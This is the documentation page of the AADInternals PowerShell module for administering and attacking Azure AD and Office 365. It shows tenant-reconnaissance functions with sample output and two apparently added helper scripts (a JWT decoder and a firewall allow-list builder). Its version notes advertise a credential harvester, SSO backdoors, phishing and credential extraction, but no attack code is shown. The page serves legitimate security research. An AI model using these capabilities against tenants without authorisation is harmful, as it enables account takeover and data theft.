AAD Internals

Introduction

The AADInternals PowerShell module contains tools for administering and hacking Azure AD and Office 365.

Installation

The module can be installed from PowerShell:

# Install the module
Install-Module AADInternals

# Import the module
Import-Module AADInternals

Output:

    ___    ___    ____  ____      __                        __    
   /   |  /   |  / __ \/  _/___  / /____  _________  ____ _/ /____
  / /| | / /| | / / / // // __ \/ __/ _ \/ ___/ __ \/ __ '/ / ___/
 / ___ |/ ___ |/ /_/ _/ // / / / /_/  __/ /  / / / / /_/ / (__  ) 
/_/  |_/_/  |_/_____/___/_/ /_/\__/\___/_/  /_/ /_/\__,_/_/____/  
  
 v0.4.4 by @NestoriSyynimaa - Cloud Identity Summit 2020 edition

The module is also available on GitHub (https://github.com/Gerenios/AADInternals) and in the PowerShell Gallery.

About

AAD Internals is a PowerShell module where I’ve tried to put all the knowledge I’ve gained during the years spent with Office 365 and Azure AD. It is a result of hours of reverse-engineering and debugging of Microsoft tools related to Azure AD, such as PowerShell modules, directory synchronisation, and admin portals.

The module is a plain PowerShell script module, so you can copy and paste the code to your own scripts as needed. Having said that, there are some functions that utilise the built-in functionality of Windows. Thus, everything might not work on every computer.

The module is now in beta, so all comments and ideas are more than welcome. You can comment on this article or post bugs and fixes to GitHub.

I haven’t tried to duplicate all the functionality the MSOnline or AzureAD modules currently have. Instead, I decided to bring the information and functionality those modules don’t provide. Also, I have created some “blackhat” level functionality that allows administrators to do things that shouldn’t even be possible.

Detailed help about parameters etc. can be seen using the PowerShell Get-Help cmdlet:

# See help for Get-AADIntAccessTokenForAADGraph
Get-Help Get-AADIntAccessTokenForAADGraph

Version info

Version Date Version notes
0.4.4 Oct 18th 2020 “Cloud Identity Summit 2020 edition”. Added device code authentication support to the access token functions (-UseDeviceCode).
Added phishing functionality.
Added -GetNonce switch for New-AADIntUserPRTToken.
Added Teams functionality.
0.4.3 Sep 29th 2020 Added Azure Cloud Shell functionality + updates to PRT/MDM.
0.4.2 Sep 9th 2020 Added MDM functionality.
0.4.1 Sep 1st 2020 Added functionality for joining “devices” to Azure AD and Intune MDM. Added PRT functionality. Some bug fixes.
0.4.0 Aug 6th 2020 Updated the Access Token cache behaviour. Now, when saved to cache, access token gets updated automatically if expired.
Added functionality for getting Azure AD tenant information and enumerating users as an outsider, guest, and insider user.
0.3.3 Jun 3rd 2020 Added functionality for elevating Global Admin to Azure User Access Administrator and functions for accessing some Azure workloads 😁
0.3.2 May 28th 2020 “psconf.eu edition”. Bug fixes and some minor feature updates to existing functions.
0.3.1 May 17th 2020 Added functionality for registering Sync agents (Azure AD Connect cloud provisioning) and listing agent information. Fixed exporting Azure AD Connect credentials and added many AD related Mimikatz-like functions.
0.2.8 Mar 30th 2020 Added functionality for registering PTA Agents and configuring users’ MFA settings. Includes an experimental PTA Agent that emulates Azure AD pass-through authentication.
0.2.7 Dec 12th 2019 “Black Hat Europe edition”.
Added OneDrive for Business functions. Allows bypassing OneDrive (and SharePoint & Teams) domain restrictions.
0.2.6 Oct 30th 2019 “T2 infosec edition”.
Added Kerberos support. Allows getting Access Tokens using Kerberos tickets, and using Seamless Single-Sign-On as backdoor.
0.2.5 Aug 16th 2019 ADFS certificate export finally working! Bug fixes.
0.2.4 Aug 2nd 2019 “Black Hat edition”.
Added client, SPO, and SARA functions, several bug fixes.
0.2.3 May 29th 2019 Added functions to manipulate ADFS token signing certificates.
0.2.2 May 22nd 2019 Added PTASpy (pass-through authentication credential harvester and backdoor).
0.1.8 May 17th 2019 Added functions to extract and reset Azure AD Connect credentials.
0.1.7 May 10th 2019 Added Exchange Online and Outlook functionality + loads of other updates.
0.1.1 Oct 25th 2018 The first beta release.

Functionality

Playing with access tokens

Most of the functions use REST APIs that require OAuth access tokens. The AADInternals module uses the following types of access tokens. Since version 0.4.0, all tokens are cached if the -SaveToCache switch is used. If a cached token has expired, it is automatically renewed with the corresponding refresh token.

Token/API Function Remarks
AAD Graph Get-AADIntAccessTokenForAADGraph Functions using AAD Graph access token.
MS Graph Get-AADIntAccessTokenForMSGraph Functions using MS Graph access token.
Pass Through Authentication Get-AADIntAccessTokenForPTA Used when enabling/disabling PTA and Seamless SSO (Desktop SSO)
Azure Admin Portal Get-AADIntAuthTokenForAADIAMAPI Used when inviting guest users.
Exchange Online Get-AADIntAccessTokenForEXO Used with Exchange Online and ActiveSync functions
Support and Recovery Assistant Get-AADIntAccessTokenForSARA Used with Support and Recovery Assistant functions
SharePoint Online Get-AADIntSPOAuthenticationHeader Used with SharePoint Online functions
OneDrive for Business New-AADIntOneDriveSettings Used with OneDrive for Business functions
Azure Core Management Get-AADIntAccessTokenForAzureCoreManagement Used with Azure Core Management functions
Azure AD Join Get-AADIntAccessTokenForAADJoin Used with Azure AD join function
Intune MDM Get-AADIntAccessTokenForIntuneMDM Used with Intune MDM functions
Azure Cloud Shell Get-AADIntAccessTokenForCloudShell Used with Azure Cloud Shell

To get an AAD Graph access token and save it to the cache, run the following function. The token is valid for an hour; after that, a new access token is fetched using the refresh token.

# Prompt for credentials and retrieve & store access token to cache
Get-AADIntAccessTokenForAADGraph -SaveToCache

To see the cached credentials:

# Show the cached credentials
Get-AADIntCache

Output:

Name            : admin@company.com
ClientId        : d3590ed6-52b3-4102-aeff-aad2292ab01c
Audience        : https://management.core.windows.net
Tenant          : 2b55c1c4-ba18-46d0-9a7a-7a75b9493dbd
IsExpired       : False
HasRefreshToken : True

Name            : admin@company.com
ClientId        : 1b730954-1685-4b74-9bfd-dac224a7b894
Audience        : https://graph.windows.net
Tenant          : 2b55c1c4-ba18-46d0-9a7a-7a75b9493dbd
IsExpired       : False
HasRefreshToken : True

To delete the cache:

# Clear credentials cache
Clear-AADIntCache
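Get-AADIntCache only tells you whether a cached token has expired. When you hold a raw token (for example the string returned by Get-AADIntAccessTokenForAADGraph without -SaveToCache), it is useful to see for yourself which API it is scoped to, which tenant and client it was issued to, and when it expires. The following is an added example, not code from AADInternals or its author: it decodes the JWT locally and reports those claims. The sample tokens are constructed in the script with fake claims and a dummy signature so it runs offline; the tenant and client IDs are the ones shown in the cache output above. Decoding is not verification: the signature is never checked, so never make an authorisation decision on claims read this way.

```powershell
# Added example, not part of AADInternals: decode a JWT access token locally and
# report the claims an operator cares about (audience, tenant, client, expiry).
# Decoding only; the signature is NOT verified, so treat the claims as informational.

function ConvertTo-Base64Url {
    param([Parameter(Mandatory)][string]$Text)
    [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Text)).TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

function ConvertFrom-Base64Url {
    param([Parameter(Mandatory)][string]$Value)
    # JWT segments are base64url without padding; restore standard base64 first
    $s = $Value.Replace('-', '+').Replace('_', '/')
    switch ($s.Length % 4) {
        2 { $s += '==' }
        3 { $s += '=' }
    }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))
}

function Read-JwtAccessToken {
    param([Parameter(Mandatory)][string]$Token)
    $parts = $Token.Split('.')
    if ($parts.Count -ne 3) { throw "Not a JWT: expected 3 segments, got $($parts.Count)" }
    $header  = ConvertFrom-Base64Url $parts[0] | ConvertFrom-Json
    $payload = ConvertFrom-Base64Url $parts[1] | ConvertFrom-Json
    $expires = [DateTimeOffset]::FromUnixTimeSeconds([long]$payload.exp).UtcDateTime
    $user    = $payload.upn
    if (-not $user) { $user = $payload.sub }          # app-only tokens carry no upn
    [PSCustomObject]@{
        Algorithm = $header.alg
        Audience  = $payload.aud                      # the API the token is good for (see the table above)
        Tenant    = $payload.tid
        ClientId  = $payload.appid                    # client the token was issued to
        User      = $user
        Scopes    = $payload.scp
        Expires   = $expires
        IsExpired = $expires -lt [DateTime]::UtcNow
    }
}

# Constructed sample tokens (fake claims, dummy signature) so this example runs offline
function New-SampleToken {
    param([string]$Audience, [string]$ClientId, [int]$LifetimeSeconds)
    $now     = [DateTimeOffset]::UtcNow.ToUnixTimeSeconds()
    $header  = @{ typ = 'JWT'; alg = 'RS256'; kid = 'constructed' } | ConvertTo-Json -Compress
    $payload = @{
        aud   = $Audience
        iss   = 'https://sts.windows.net/2b55c1c4-ba18-46d0-9a7a-7a75b9493dbd/'
        tid   = '2b55c1c4-ba18-46d0-9a7a-7a75b9493dbd'
        appid = $ClientId
        upn   = 'admin@company.com'
        scp   = 'user_impersonation'
        nbf   = $now
        exp   = $now + $LifetimeSeconds
    } | ConvertTo-Json -Compress
    "$(ConvertTo-Base64Url $header).$(ConvertTo-Base64Url $payload).c2lnbmF0dXJl"
}

$live    = New-SampleToken -Audience 'https://graph.windows.net' -ClientId '1b730954-1685-4b74-9bfd-dac224a7b894' -LifetimeSeconds 3600
$expired = New-SampleToken -Audience 'https://management.core.windows.net' -ClientId 'd3590ed6-52b3-4102-aeff-aad2292ab01c' -LifetimeSeconds -600

# The first prints IsExpired : False, the second IsExpired : True
$live, $expired | ForEach-Object { Read-JwtAccessToken $_ } | Format-List
```

On a real token the call is simply `$at = Get-AADIntAccessTokenForAADGraph; Read-JwtAccessToken $at`. Comparing Audience against the table above is a quick way to catch the classic mistake of passing a token for one API (say, AAD Graph) to a function that needs another (say, Exchange Online).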

Tenant information and manipulation functions

Information functions are functions that can be used to retrieve information about users, tenants, and Office 365. Functions marked with * don’t need authentication. Functions marked with A use an AAD Graph access token. Functions marked with E use an Exchange Online access token.

Get-AADIntLoginInformation (*)

This function returns login information for the given user (or domain).

Example:

# Get login information for a domain (the output below is for microsoft.com)
Get-AADIntLoginInformation -Domain microsoft.com

Output:

Federation Protocol                  : WSTrust
Pref Credential                      : 4
Consumer Domain                      : 
Cloud Instance audience urn          : urn:federation:MicrosoftOnline
Authentication Url                   : https://msft.sts.microsoft.com/adfs/ls/?username=nn%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
Throttle Status                      : 1
Account Type                         : Federated
Has Password                         : True
Federation Active Authentication Url : https://msft.sts.microsoft.com/adfs/services/trust/2005/usernamemixed
Exists                               : 0
Federation Metadata Url              : https://msft.sts.microsoft.com/adfs/services/trust/mex
Desktop Sso Enabled                  : 
Tenant Banner Logo                   : 
Tenant Locale                        : 
Cloud Instance                       : microsoftonline.com
State                                : 3
Domain Type                          : 4
Domain Name                          : microsoft.com
Tenant Banner Illustration           : 
Federation Brand Name                : Microsoft
Federation Global Version            : -1
User State                           : 2

Get-AADIntEndpointInstances (*)

This function returns the Office 365 instances and the version stamp of the latest change to their endpoint data (IPs and URLs).

Example:

# Get Office 365 instances
Get-AADIntEndpointInstances 

Output:

instance     latest    
--------     ------    
Worldwide    2018100100
USGovDoD     2018100100
USGovGCCHigh 2018100100
China        2018100100
Germany      2018100100

Get-AADIntEndpointIps (*)

This function returns the Office 365 IP addresses and URLs for the given instance. The information can be used to create firewall rules.

Example:

# Get IPs and URLs for "normal" (Worldwide) Office 365
Get-AADIntEndpointIps -Instance WorldWide

Output:

id                     : 1
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {outlook.office.com, outlook.office365.com}
ips                    : {13.107.6.152/31, 13.107.9.152/31, 13.107.18.10/31, 13.107.19.10/31...}
tcpPorts               : 80,443
expressRoute           : True
category               : Optimize
required               : True

id                     : 2
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {smtp.office365.com}
ips                    : {13.107.6.152/31, 13.107.9.152/31, 13.107.18.10/31, 13.107.19.10/31...}
tcpPorts               : 587
expressRoute           : True
category               : Allow
required               : True
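The records above are not directly usable as firewall rules: the same CIDRs recur across many records, ports are comma-separated strings, optional features are mixed in with required ones, and the list contains IPv6 ranges as well. The following is an added example, not code from AADInternals or its author, that turns records of this shape into a de-duplicated allow-list keyed by protocol, port and CIDR. It runs offline on constructed sample records that mirror the two shown above (plus a Teams UDP record, an optional record and an IPv6 range, all constructed); in practice you would pipe `Get-AADIntEndpointIps -Instance Worldwide` into it. The category handling follows Microsoft's published meaning of the Optimize, Allow and Default categories.

```powershell
# Added example, not part of AADInternals: build a de-duplicated, per-port allow-list
# from endpoint records shaped like the output above. Runs offline on constructed data;
# in practice pipe Get-AADIntEndpointIps -Instance Worldwide into it.

function ConvertTo-FirewallAllowList {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $Endpoint,
        # Optimize and Allow endpoints are meant to get direct, unproxied connectivity;
        # Default traffic normally goes via the ordinary proxy, so it is left out here
        [string[]] $Category = @('Optimize', 'Allow')
    )
    begin { $rows = @() }
    process {
        if (-not $Endpoint.required) { return }                 # optional feature: do not open
        if ($Endpoint.category -notin $Category) { return }
        if (-not $Endpoint.ips) { return }                      # URL-only record, no CIDRs to allow
        foreach ($proto in 'tcp', 'udp') {
            $ports = $Endpoint."${proto}Ports"                  # tcpPorts / udpPorts, "80,443" style strings
            if (-not $ports) { continue }
            foreach ($port in ($ports -split ',')) {
                foreach ($cidr in $Endpoint.ips) {
                    # IPv4 only here; extend the pattern if your edge filters IPv6
                    if ($cidr -notmatch '^\d{1,3}(\.\d{1,3}){3}/\d{1,2}$') { continue }
                    $rows += [PSCustomObject]@{
                        Protocol = $proto.ToUpper()
                        Port     = [int]$port.Trim()
                        Cidr     = $cidr
                        Service  = $Endpoint.serviceArea
                    }
                }
            }
        }
    }
    end {
        # one rule per (protocol, port, CIDR); the first service name wins when several share a range
        $rows | Sort-Object Protocol, Port, Cidr -Unique
    }
}

# Constructed sample records mirroring the shape shown above (plus UDP, optional and IPv6 cases)
$sample = @(
    [PSCustomObject]@{ id = 1; serviceArea = 'Exchange'; urls = @('outlook.office.com', 'outlook.office365.com'); ips = @('13.107.6.152/31', '13.107.18.10/31', '2603:1006::/40'); tcpPorts = '80,443'; category = 'Optimize'; required = $true }
    [PSCustomObject]@{ id = 2; serviceArea = 'Exchange'; urls = @('smtp.office365.com'); ips = @('13.107.6.152/31', '13.107.18.10/31'); tcpPorts = '587'; category = 'Allow'; required = $true }
    [PSCustomObject]@{ id = 3; serviceArea = 'Skype'; urls = @('*.teams.microsoft.com'); ips = @('52.112.0.0/14'); tcpPorts = '443'; udpPorts = '3478,3479,3480,3481'; category = 'Optimize'; required = $true }
    [PSCustomObject]@{ id = 4; serviceArea = 'Exchange'; urls = @('*.protection.outlook.com'); ips = @('40.92.0.0/15'); tcpPorts = '443'; category = 'Default'; required = $false }
)

# Record 4 is dropped (optional, Default), the IPv6 range is skipped, and the two
# Exchange CIDRs appear once per port instead of once per record
$sample | ConvertTo-FirewallAllowList | Format-Table -AutoSize
```

Regenerate the list whenever Get-AADIntEndpointInstances reports a newer version stamp for your instance; the endpoint data changes regularly, and a stale allow-list is how Outlook connectivity quietly breaks.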

Get-AADIntTenantDetails (A)

This function returns details for the given tenant.

Example:

# Get tenant details
Get-AADIntTenantDetails

Output:

odata.type                           : Microsoft.DirectoryServices.TenantDetail
objectType                           : Company
objectId                             : e21e0e8c-d2ed-4edf-aa91-937963949cdc
deletionTimestamp                    : 
assignedPlans                        : ..
city                                 : 
companyLastDirSyncTime               : 2018-10-25T12:53:43Z
country                              : 
countryLetterCode                    : FI
dirSyncEnabled                       : True
displayName                          : Company Ltd
marketingNotificationEmails          : {}
postalCode                           : 
preferredLanguage                    : en
privacyProfile                       : 
provisionedPlans                     : ..
provisioningErrors                   : {}
securityComplianceNotificationMails  : {}
securityComplianceNotificationPhones : {}
state                                : 
street                               : 
technicalNotificationMails           : {user@alt.none}
telephoneNumber                      : 123456789
verifiedDomains                      : ..

Get-AADIntTenantID (*)

Since version 0.1.6
This function returns tenant id for the given user, domain, or Access Token.

Example:

# Get tenant ID
Get-AADIntTenantID -Domain microsoft.com

Output:

72f988bf-86f1-41af-91ab-2d7cd011db47

Get-AADIntOpenIDConfiguration (*)

Since version 0.1.6
This function returns the open ID configuration for the given user or domain.

Example:

# Get OpenID configuration
Get-AADIntOpenIDConfiguration -Domain microsoft.com

Output:

authorization_endpoint                : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
token_endpoint                        : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/token
token_endpoint_auth_methods_supported : {client_secret_post, private_key_jwt, client_secret_basic}
jwks_uri                              : https://login.microsoftonline.com/common/discovery/keys
response_modes_supported              : {query, fragment, form_post}
subject_types_supported               : {pairwise}
id_token_signing_alg_values_supported : {RS256}
http_logout_supported                 : True
frontchannel_logout_supported         : True
end_session_endpoint                  : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/logout
response_types_supported              : {code, id_token, code id_token, token id_token...}
scopes_supported                      : {openid}
issuer                                : https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/
claims_supported                      : {sub, iss, cloud_instance_name, cloud_instance_host_name...}
microsoft_multi_refresh_token         : True
check_session_iframe                  : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/checksession
userinfo_endpoint                     : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/openid/userinfo
tenant_region_scope                   : WW
cloud_instance_name                   : microsoftonline.com
cloud_graph_host_name                 : graph.windows.net
msgraph_host                          : graph.microsoft.com
rbac_url                              : https://pas.windows.net

Get-AADIntServiceLocations (A)

This function shows the tenant’s actual service locations: the region, instance and country of each workload.

Example:

# Get service location information of the tenant
Get-AADIntServiceLocations | Format-Table

Output:

Region Instance             Name                          State Country
------ --------             ----                          ----- -------
EU     EU001                PowerBI                             IR     
EU     PROD_MSUB01_02       SCO                                 IE     
NA     NA001                MultiFactorService                  US     
NA     NA001                AzureAdvancedThreatAnalytics        US     
EU     Prod04               Adallom                             GB     
NA     NA001                AADPremiumService                   US     
EU     EURP191-001-01       exchange                            IE     
NA     NA003                YammerEnterprise                    US     
NA     NA001                To-Do                               US     
NA     NA001                TeamspaceAPI                        US     
NA     NA001                Sway                                US     
EU     SPOS1196             SharePoint                          NL     
EU     EU                   RMSOnline                           NL     
EU     PROD_EU_Org_Ring_152 ProjectWorkManagement               NL     
NA     NA001                ProcessSimple                       US     
NA     NA001                PowerAppsService                    US     
NA     NA001                OfficeForms                         US     
NA     NA001                MicrosoftStream                     US     
NA     NorthAmerica1        MicrosoftOffice                     US     
EU     EMEA-2E-S3           MicrosoftCommunicationsOnline       NL     
EU     emea05-01            ExchangeOnlineProtection            NL     
NA     NA001                Deskless                            US     
NA     NA002                SMIT                                US     
NA     NA001                Metro                               US     
EU     EU003                DirectoryToCosmos                   GB     
NA     *                    BecWSClients                        US     
NA     NA033                BDM                                 US     
EU     EUGB02               AadAllTenantsNotifications          GB

Get-AADIntServicePlans (A)

This function returns information about tenant’s service plans, such as name, id, status, and when first assigned.

Example:

# Get the service plans of the tenant
Get-AADIntServicePlans | Format-Table

Output:

SKU               ServicePlanId                        ServiceName           ServiceType                   AssignedTimestamp    CapabilityStatus ProvisioningStatus
---               -------------                        -----------           -----------                   -----------------    ---------------- ------------------
ENTERPRISEPREMIUM b1188c4c-1b36-4018-b48b-ee07604f6feb PAM_ENTERPRISE        Exchange                      2018-09-27T15:47:45Z Enabled          Success           
                  76846ad7-7776-4c40-a281-a386362dd1b9                       ProcessSimple                 2018-09-27T15:47:25Z Deleted                            
                  c87f142c-d1e9-4363-8630-aaea9c4d9ae5                       To-Do                         2018-09-27T15:47:24Z Deleted                            
                  c68f8d98-5534-41c8-bf36-22fa496fa792                       PowerAppsService              2018-09-27T15:47:25Z Deleted                            
                  9e700747-8b1d-45e5-ab8d-ef187ceec156                       MicrosoftStream               2018-09-27T15:47:25Z Deleted                            
                  2789c901-c14e-48ab-a76a-be334d9d793a                       OfficeForms                   2018-09-27T15:47:25Z Deleted                            
ENTERPRISEPREMIUM 9f431833-0334-42de-a7dc-70aa40db46db LOCKBOX_ENTERPRISE    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 3fb82609-8c27-4f7b-bd51-30634711ee67 BPOS_S_TODO_3         To-Do                         2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 7547a3fe-08ee-4ccb-b430-5077c5041653 YAMMER_ENTERPRISE     YammerEnterprise              2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8e0c0a52-6a6c-4d40-8370-dd62790dcd70 THREAT_INTELLIGENCE   Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 9c0dab89-a30c-4117-86e7-97bda240acd2 POWERAPPS_O365_P3     PowerAppsService              2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM b737dad2-2f6c-4c65-90e3-ca563267e8b9 PROJECTWORKMANAGEMENT ProjectWorkManagement         2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 5dbe027f-2339-4123-9542-606e4d348a72 SHAREPOINTENTERPRISE  SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c098270-9dd4-4350-9b30-ba4703f3b36b ADALLOM_S_O365        Adallom                       2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 6c6042f5-6f01-4d67-b8c1-eb99d36eed3e STREAM_O365_E5        MicrosoftStream               2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 07699545-9485-468e-95b6-2fca3738be01 FLOW_O365_P3          ProcessSimple                 2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4de31727-a228-4ec3-a5bf-8e45b5ca48cc EQUIVIO_ANALYTICS     Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 0feaeb32-d00e-4d66-bd5a-43b5b83db82c MCOSTANDARD           MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 70d33638-9c74-4d01-bfd3-562de28bd4ba BI_AZURE_P2           PowerBI                       2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 43de0ff5-c92c-492b-9116-175376d08c38 OFFICESUBSCRIPTION    MicrosoftOffice               2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 3e26ee1f-8a5f-4d52-aee2-b81ce45c8f40 MCOMEETADV            MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e95bec33-7c88-4a70-8e19-b10bd9d0c014 SHAREPOINTWAC         SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c7d2df8-86f0-4902-b2ed-a0458298f3b3 Deskless              Deskless                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 57ff2da0-773e-42df-b2af-ffb7a2317929 TEAMS1                TeamspaceAPI                  2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4828c8ec-dc2e-4779-b502-87ac9ce28ab7 MCOEV                 MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 34c0d7a0-a70f-4668-9238-47f9fc208882 EXCHANGE_ANALYTICS    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM f20fedf3-f3c3-43c3-8267-2bfdd51c0939 ATP_ENTERPRISE        Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM efb87545-963c-4e0d-99df-69c6916d9eb0 EXCHANGE_S_ENTERPRISE Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e212cbc7-0961-4c40-9825-01117710dcb1 FORMS_PLAN_E5         OfficeForms                   2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM a23b959c-7ce8-4e57-9140-b90eb88a9e97 SWAY                  Sway                          2018-08-27T05:46:51Z Enabled          Success           
EMSPREMIUM        113feb6c-3fe4-4440-bddc-54d774bf0318 EXCHANGE_S_FOUNDATION Exchange                      2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        eec0eb4f-6444-4f95-aba0-50c24d67f998 AAD_PREMIUM_P2        AADPremiumService             2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        c1ec4a95-1f05-45b3-a911-aa3fa01094f5 INTUNE_A              SCO                           2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        2e2ddb96-6af9-4b1d-a3f0-d6ecfd22edb2 ADALLOM_S_STANDALONE  Adallom                       2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        6c57d4b6-3b23-47a5-9bc9-69f17b4947b3 RMS_S_PREMIUM         RMSOnline                     2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        41781fb2-bc02-4b7c-bd55-b576c07bb09d AAD_PREMIUM           AADPremiumService             2018-08-13T10:17:34Z Enabled          Success           
EMSPREMIUM        14ab5db5-e6c4-4b20-b4bc-13e36fd2227f ATA                   AzureAdvancedThreatAnalytics  2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        8a256a2b-b617-496d-b51b-e76466e88db0 MFA_PREMIUM           MultiFactorService            2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        5689bec4-755d-4753-8b61-40975025187c RMS_S_PREMIUM2        RMSOnline                     2018-08-13T10:17:31Z Enabled          Success           
ENTERPRISEPREMIUM 882e1d05-acd1-4ccb-8708-6ee03664b117 INTUNE_O365           SCO                           2018-07-26T15:47:50Z Deleted          PendingActivation 
EMSPREMIUM        bea4c11e-220a-4e6d-8eb8-8ea15d019f90 RMS_S_ENTERPRISE      RMSOnline                     2018-06-26T10:47:37Z Enabled          Success

Get-AADIntSubscriptions (A)

This function returns tenant’s subscription details, such as name, id, number of licenses, and when created.

Example:

# Get subscriptions of the tenant
Get-AADIntSubscriptions

Output:

SkuPartNumber     WarningUnits TotalLicenses IsTrial NextLifecycleDate    OcpSubscriptionId                    ConsumedUnits ObjectId                             SkuId                                DateCreated         
-------------     ------------ ------------- ------- -----------------    -----------------                    ------------- --------                             -----                                -----------         
EMSPREMIUM        0            250           true    2018-11-13T00:00:00Z 76909010-12ed-4b05-b3d7-ee1b42c21b4e 21            58265dbe-24e0-4cdb-8b62-51197a4c1c13 b05e124f-c7cc-45a0-a6aa-8cf78c946968 2018-08-13T00:00:00Z
ENTERPRISEPREMIUM 25           25            true    2018-10-27T15:47:40Z 7c206b83-2487-49fa-b91e-3d676de02ccb 21            df58544b-5062-4d6c-85de-937f203bbe0f c7df2760-2c81-4ef7-b578-5b5392b571df 2018-08-27T00:00:00Z

Get-AADIntSPOServiceInformation (A)

This function returns details of tenant’s SharePoint Online instance, such as when created and last modified.

Example:

# Get SharePoint Online information
Get-AADIntSPOServiceInformation

Output: (sorted for clarity)

CreatedOn                               : 6/26/2018 11:16:12 AM
EnableOneDriveforSuiteUsers             : False
InstanceId                              : 44f5a625-f90e-4916-b8ab-ec45d38bdbb6
LastModifiedOn                          : 10/25/2018 7:37:38 AM
OfficeGraphUrl                          : https://company-my.sharepoint.com/_layouts/15/me.aspx
RootAdminUrl                            : https://company-admin.sharepoint.com/
RootIWSPOUrl                            : https://company-my.sharepoint.com/
SPO_LegacyPublicWebSiteEditPage         : Pages/Forms/AllItems.aspx
SPO_LegacyPublicWebSitePublicUrl        : 
SPO_LegacyPublicWebSiteUrl              : 
SPO_MySiteHostUrl                       : https://company-my.sharepoint.com/
SPO_MySiteHost_AboutMeUrl               : https://company-my.sharepoint.com/person.aspx
SPO_MySiteHost_DocumentsUrl             : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllDocuments
SPO_MySiteHost_NewsFeedUrl              : https://company-my.sharepoint.com/default.aspx
SPO_MySiteHost_ProjectSiteUrl           : https://company-my.sharepoint.com/_layouts/15/MyProjects.aspx
SPO_MySiteHost_SitesUrl                 : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllSites
SPO_PublicWebSitePublicUrl              : 
SPO_PublicWebSiteUrl                    : NotSupported
SPO_RegionalRootSiteUrl                 : https://company.sharepoint.com/
SPO_RootSiteUrl                         : https://company.sharepoint.com/
SPO_TenantAdminUrl                      : https://company-admin.sharepoint.com/
SPO_TenantAdmin_CreateSiteCollectionUrl : https://company-admin.sharepoint.com/_layouts/15/online/CreateSiteFull.aspx
SPO_TenantAdmin_ProjectAdminUrl         : https://company-admin.sharepoint.com/
SPO_TenantAdmin_ViewSiteCollectionsUrl  : https://company-admin.sharepoint.com/
SPO_TenantUpgradeUrl                    : https://company-admin.sharepoint.com/
ServiceInformation_LastChangeDate       : 10/25/2018 7:37:22 AM
ShowSites_InitialVisibility             : True
ShowSkyDrivePro_InitialVisibility       : True
ShowYammerNewsFeed_InitialVisibility    : True
VideoPortalServerRelativeUrl            : /portals/hub/_layouts/15/videohome.aspx

Get-AADIntCompanyInformation (A)

This function returns details about the tenant’s company information. Pretty much the same functionality as the Get-MsolCompanyInformation cmdlet.

Example:

# Get company information of the tenant
Get-AADIntCompanyInformation

Output:

AllowAdHocSubscriptions                  : false
AllowEmailVerifiedUsers                  : false
AuthorizedServiceInstances               : AuthorizedServiceInstances
AuthorizedServices                       : 
City                                     : 
CompanyDeletionStartTime                 : 
CompanyTags                              : CompanyTags
CompanyType                              : CompanyTenant
CompassEnabled                           : 
Country                                  : 
CountryLetterCode                        : GB
DapEnabled                               : 
DefaultUsageLocation                     : 
DirSyncAnchorAttribute                   : 
DirSyncApplicationType                   : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DirSyncClientMachineName                 : SERVER2016
DirSyncClientVersion                     : 1.1.882.0
DirSyncServiceAccount                    : Sync_SERVER2016_acf4f37725ce@company.onmicrosoft.com
DirectorySynchronizationEnabled          : true
DirectorySynchronizationStatus           : Enabled
DisplayName                              : Company Ltd
InitialDomain                            : company.onmicrosoft.com
LastDirSyncTime                          : 2018-10-25T13:53:46Z
LastPasswordSyncTime                     : 2018-10-25T14:03:01Z
